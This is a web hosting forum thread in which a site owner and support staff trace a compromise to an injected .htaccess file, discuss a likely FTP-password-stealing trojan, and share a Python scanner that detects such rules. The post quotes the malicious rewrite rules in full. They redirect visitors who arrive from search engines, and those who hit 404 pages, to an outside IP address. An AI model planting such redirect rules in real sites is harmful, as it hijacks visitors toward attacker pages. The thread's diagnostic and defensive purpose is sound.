Strange. The link on that page works fine for me too. So perhaps it is not all referrers, and only some? I'd be interested in what google has to say.
Regarding mail2forum, you could always have one written...
Send your friends and site visitors to GlowHost and get $125 plus bonus!
GlowHost Affiliate Program | Read our Blog | Follow us on X |
Found the culprit: the .htaccess file in the root was added or modified with this code:
Code:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L]
Errordocument 404 http://87.248.180.90/in.html?s=sg_err
and the same file was also placed in the public_html folder.
Good call on the redirection/referrer cause, Matt.
Why was the intrusion allowed in the Root folder? I would think that phpBB doesn't have access to the Root folder?
What can we do to prevent future occurrences?
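An added example, not part of the original thread or any poster's code: a small Python check that flags the pattern quoted above, a RewriteRule that redirects off-site only when a RewriteCond matches HTTP_REFERER, plus an ErrorDocument pointing at an external URL. The function names, the `own_hosts` parameter and the shortened sample are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Constructed sample mirroring the injected rules quoted in the post above.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.90/in.html?s=sg [R,L]
Errordocument 404 http://87.248.180.90/in.html?s=sg_err
"""

def external_host(target, own_hosts):
    """Return the host of an absolute http(s) URL not in own_hosts, else None."""
    parts = urlsplit(target)
    if parts.scheme.lower() in ("http", "https") and parts.hostname:
        host = parts.hostname.lower()
        return None if host in own_hosts else host
    return None

def scan_htaccess(text, own_hosts=()):
    """Flag referrer-conditional redirects and ErrorDocuments pointing off-site."""
    own = {h.lower() for h in own_hosts}
    findings, referer_conds = [], 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        directive = tokens[0].lower()  # Apache directive names are case-insensitive
        if directive == "rewritecond":
            if len(tokens) > 1 and "http_referer" in tokens[1].lower():
                referer_conds += 1
        elif directive == "rewriterule":
            host = external_host(tokens[2], own) if len(tokens) > 2 else None
            if host and referer_conds:
                findings.append((lineno, "referer-conditional redirect", host))
            elif host:
                findings.append((lineno, "external redirect", host))
            referer_conds = 0  # RewriteConds apply only to the next RewriteRule
        elif directive == "errordocument" and len(tokens) > 2:
            host = external_host(tokens[2], own)
            if host:
                findings.append((lineno, "external ErrorDocument", host))
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, own_hosts=["mydomain.com"]):
        print(finding)
```

Run over every .htaccess in the account (the root and public_html both held a copy here), this kind of check catches the file even when visiting the site directly looks normal.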
The logs seem to indicate that your FTP password was compromised. There are some newer exploits out there where a 3rd party site somehow managed to install a trojan on your PC and it sniffs out FTP passwords that have been saved on your PC, then sends them "home" and then "home" uploads all sorts of fun things from htaccess files to new scripts and the link.
The best fix I have found is to run antivirus scans on all computers that you use to access the site via FTP. Once they are clean, change the main cPanel password to something impossible to guess, then set up FTP users for each machine that connects to the site via FTP, e.g. laptop@mydomain.com, desktop@mydomain.com, 3rdparty@mydomain.com, etc.
That way, if and when it happens again, we can tell you which FTP user was compromised from the logs and you can focus your efforts on figuring out what the security issue is on that unique machine.
McAfee scan came back clean. Running Avast scan now...will report results.
Avast scan came back clear as well. This is the only machine I use for FTP connections to my server.
Any other ideas where the compromise might have occurred? Could there be a flaw in cPanel?
Was the old password something easily guessed? I suppose the only other way they could get it is perhaps with a packet sniffer.
Not easy to guess at all. Where would the packet sniffer intercept my traffic?
Anywhere on the Internet I suppose....
how does a packet sniffer work - Google Search